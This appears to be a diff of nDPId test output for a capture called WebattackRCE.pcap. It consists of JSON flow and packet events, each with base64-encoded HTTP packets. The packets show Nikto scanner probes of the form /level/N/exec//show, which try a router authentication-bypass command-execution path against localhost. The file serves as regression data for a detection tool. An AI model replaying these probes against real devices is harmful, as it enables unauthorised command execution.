+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":568,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":568,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277586,"flow_last_seen":1576420277586,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277586,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50698,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/20\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001267)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":569,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":569,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277588,"flow_last_seen":1576420277588,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277588,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50700,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":569,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":569,"flow_packet_id":1,"flow_last_seen":1576420277588,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277588,"pkt":"AAAAAAAAAAAAAAAACABFAADIUb5AAEAG6m9\/AAABfwAAAcYMH5BdL2lKom\/agYAYAED+vAAAAQEICp1m\/nydZv58R0VUIC9sZXZlbC8yMS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNjgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":569,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":569,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277588,"flow_last_seen":1576420277588,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277588,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50700,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/21\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001268)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":569,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":569,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277588,"flow_last_seen":1576420277588,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277588,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50700,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/21\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001268)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":570,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":570,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277590,"flow_last_seen":1576420277590,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277590,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50702,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":570,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":570,"flow_packet_id":1,"flow_last_seen":1576420277590,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277590,"pkt":"AAAAAAAAAAAAAAAACABFAADIMkhAAEAGCeZ\/AAABfwAAAcYOH5Ck4gq0tTkM3YAYAED+vAAAAQEICp1m\/n6dZv5+R0VUIC9sZXZlbC8yMi9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNjkpDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":570,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":570,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277590,"flow_last_seen":1576420277590,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277590,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50702,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/22\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001269)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":570,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":570,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277590,"flow_last_seen":1576420277590,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277590,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50702,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/22\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001269)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":571,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":571,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277592,"flow_last_seen":1576420277592,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277592,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50704,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":571,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":571,"flow_packet_id":1,"flow_last_seen":1576420277592,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277592,"pkt":"AAAAAAAAAAAAAAAACABFAADIGgdAAEAGIid\/AAABfwAAAcYQH5AVMSL0hIVMXoAYAED+vAAAAQEICp1m\/oCdZv5\/R0VUIC9sZXZlbC8yMy9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjcwKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":571,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":571,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277592,"flow_last_seen":1576420277592,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277592,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50704,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/23\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001270)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":571,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":571,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277592,"flow_last_seen":1576420277592,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277592,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50704,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/23\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001270)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":572,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":572,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277593,"flow_last_seen":1576420277593,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277593,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50706,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":572,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":572,"flow_packet_id":1,"flow_last_seen":1576420277593,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277593,"pkt":"AAAAAAAAAAAAAAAACABFAADI3vBAAEAGXT1\/AAABfwAAAcYSH5AD6eYZLZCITIAYAED+vAAAAQEICp1m\/oGdZv6BR0VUIC9sZXZlbC8yNC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNzEpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":572,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":572,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277593,"flow_last_seen":1576420277593,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277593,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50706,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/24\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001271)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":572,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":572,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277593,"flow_last_seen":1576420277593,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277593,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50706,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/24\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001271)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":573,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":573,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277595,"flow_last_seen":1576420277595,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277595,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50708,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":573,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":573,"flow_packet_id":1,"flow_last_seen":1576420277595,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277595,"pkt":"AAAAAAAAAAAAAAAACABFAADIjYJAAEAGrqt\/AAABfwAAAcYUH5BJPLV3Xqa0Y4AYAED+vAAAAQEICp1m\/oOdZv6DR0VUIC9sZXZlbC8yNS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNzIpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":573,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":573,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277595,"flow_last_seen":1576420277595,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277595,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50708,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/25\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001272)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":573,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":573,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277595,"flow_last_seen":1576420277595,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277595,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50708,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/25\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001272)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":574,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":574,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277597,"flow_last_seen":1576420277597,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277597,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50710,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":574,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":574,"flow_packet_id":1,"flow_last_seen":1576420277597,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277597,"pkt":"AAAAAAAAAAAAAAAACABFAADI4QFAAEAGWyx\/AAABfwAAAcYWH5APltgJOmv38YAYAED+vAAAAQEICp1m\/oSdZv6ER0VUIC9sZXZlbC8yNi9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjczKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":574,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":574,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277597,"flow_last_seen":1576420277597,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277597,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50710,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/26\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001273)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":574,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":574,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277597,"flow_last_seen":1576420277597,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277597,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50710,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/26\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001273)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":575,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":575,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277598,"flow_last_seen":1576420277598,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277598,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50712,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":575,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":575,"flow_packet_id":1,"flow_last_seen":1576420277598,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277598,"pkt":"AAAAAAAAAAAAAAAACABFAADIuK1AAEAGg4B\/AAABfwAAAcYYH5AkxYBd7ezrAoAYAED+vAAAAQEICp1m\/oadZv6GR0VUIC9sZXZlbC8yNy9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyNzQpDQoNCg=="} -01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":575,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":575,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277598,"flow_last_seen":1576420277598,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277598,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50712,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/27\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001274)"}} 
+01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":575,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":575,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277598,"flow_last_seen":1576420277598,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277598,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50712,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/27\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001274)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":576,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":576,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277600,"flow_last_seen":1576420277600,"flow_idle_time":7580000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277600,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50714,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":576,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":576,"flow_packet_id":1,"flow_last_seen":1576420277600,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277600,"pkt":"AAAAAAAAAAAAAAAACABFAADIQiNAAEAG+gp\/AAABfwAAAcYaH5DTCnrawy0BcYAYAED+vAAAAQEICp1m\/oidZv6IR0VUIC9sZXZlbC8yOC9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjc1KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 